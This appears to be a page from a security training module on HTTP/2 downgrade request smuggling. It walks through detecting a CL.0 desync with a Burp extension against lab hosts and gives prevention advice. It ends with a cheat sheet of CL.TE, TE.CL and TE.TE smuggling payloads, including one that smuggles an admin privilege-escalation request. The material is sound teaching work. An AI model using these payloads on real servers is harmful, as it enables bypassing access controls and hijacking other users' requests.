HTTP Attacks

HTTP/2 Downgrading Tools & Prevention

After discussing how we can exploit HTTP request smuggling vulnerabilities in HTTP/2 settings, let's explore tools that can help us during identification and exploitation. Lastly, we will discuss how we can protect ourselves from HTTP/2 request smuggling vulnerabilities.

Tools of the Trade

We can again use the Burp Extension HTTP Request Smuggler to make our lives significantly easier when hunting for HTTP/2-related request smuggling vulnerabilities.

To start, we can send any HTTP/2 request to Burp Repeater. As an example, consider the following request:

GET /index.php?param1=HelloWorld HTTP/2
Host: http2.htb

We can then right-click the request and go to Extensions > HTTP Request Smuggler > CL.0:

This will open a new window that is most likely too large for your screen. Just leave everything in the default settings and press Enter to start the scan. Burp will then run a scan for a CL.0 vulnerability in the background. This is the same as the type of H2.CL vulnerability discussed in the previous section. It is also called CL.0 vulnerability since the CL header is set to 0 and the request body contains only the smuggled request.

We can see the result of the scan in Extensions > Installed. When selecting the HTTP Request Smuggler extension from the list, select the Output Tab at the bottom of the window. The result is printed to the UI and looks like this:

Queueing reuest scan: CL.0
Found issue: CL.0 desync: h2CL|TRACE /
Target: https://172.17.0.2
HTTP Request Smuggler repeatedly issued the attached request. After 1 attempts, it got a response that appears to have been poisoned by the body of the previous request. For further details and information on remediation, please refer to https://portswigger.net/research/browser-powered-desync-attacks
Evidence: 
======================================
GET /index.php HTTP/2
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com


======================================
POST /index.php HTTP/1.1
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

TRACE / HTTP/1.1
X-YzBqv: 
======================================
POST /index.php HTTP/1.1
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

TRACE / HTTP/1.1
X-YzBqv: 
======================================

Burp tells us that the web application is vulnerable to a CL.0 vulnerability. It gives us a proof-of-concept request to verify the finding from the automated scan. Let's verify the result. To do so, we are going to use the following requests from the above output. Request 1:

POST /index.php HTTP/1.1
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

TRACE / HTTP/1.1
X-YzBqv:

Request 2:

GET /index.php HTTP/2
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com

Create a tab group in Burp Repeater and ensure that the Update Content-Length option is unchecked for the first request. To verify that other users can be affected, we will send the two requests subsequently via separate TCP connections, giving us the following two responses. The first response is a 200 status code and contains the index we requested:

However, the second response is a 405 status code:

This indicates that we successfully smuggled the TRACE request past the reverse proxy and influenced the second request, proving a request smuggling vulnerability with the help of the burp extension HTTP Request Smuggler.

HTTP/2 Attacks Prevention

The main cause for the attacks described here is HTTP/2 downgrading. Reverse proxies should not rewrite HTTP/2 requests to HTTP/1.1. Instead, HTTP/2 should be implemented end-to-end such that no rewriting is required. The difference in the two protocol versions means that minor deviations from the specifications in the implementation of reverse proxy and web server software can cause vulnerabilities such as request smuggling. Proper configuration and implementation of HTTP/2 prevent these issues entirely.

Previous Next

Introduction to HTTP Attacks

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

CRLF Injection

Description	Character	ASCII (Decimal)	ASCII (Hex)	URL Encoded
Carriage Return	`\r`	`13`	`0x0D`	`%0D`
Line Feed	`\n`	`10`	`0x0A`	`%0A`

Request Smuggling

Content-Length

request body length specified in the Content-Length header

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

param1=HelloWorld&param2=Test

Chunked Encoding

Transfer-Encoding header set to chunked to specify chunked encoding
Each chunk contains the chunk length in hex followed by a newline and the chunk data
Request terminated with empty chunk 0

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1d
param1=HelloWorld&param2=Test
0

CL.TE Vulnerability

reverse proxy uses the Content-Length header, web server uses the Transfer-Encoding header

POST / HTTP/1.1
Host: clte.htb
Content-Length: 52
Transfer-Encoding: chunked

0

POST /admin.php?promote_uid=2 HTTP/1.1
Dummy:

TE.CL Vulnerability

reverse proxy uses the Transfer-Encoding header, web server uses the Content-Length header

GET /404 HTTP/1.1
Host: tecl.htb
Content-Length: 4
Transfer-Encoding: chunked

27
GET /admin HTTP/1.1
Host: tecl.htb


0

TE.TE Vulnerability

obfuscate Transfer-Encoding header from one of the systems to provoke a CL.TE or TE.CL vulnerability

Description	Header
Substring match	`Transfer-Encoding: testchunked`
Space in Header name	`Transfer-Encoding : chunked`
Horizontal Tab Separator	`Transfer-Encoding:[\x09]chunked`
Vertical Tab Separator	`Transfer-Encoding:[\x0b]chunked`
Leading space	`Transfer-Encoding: chunked`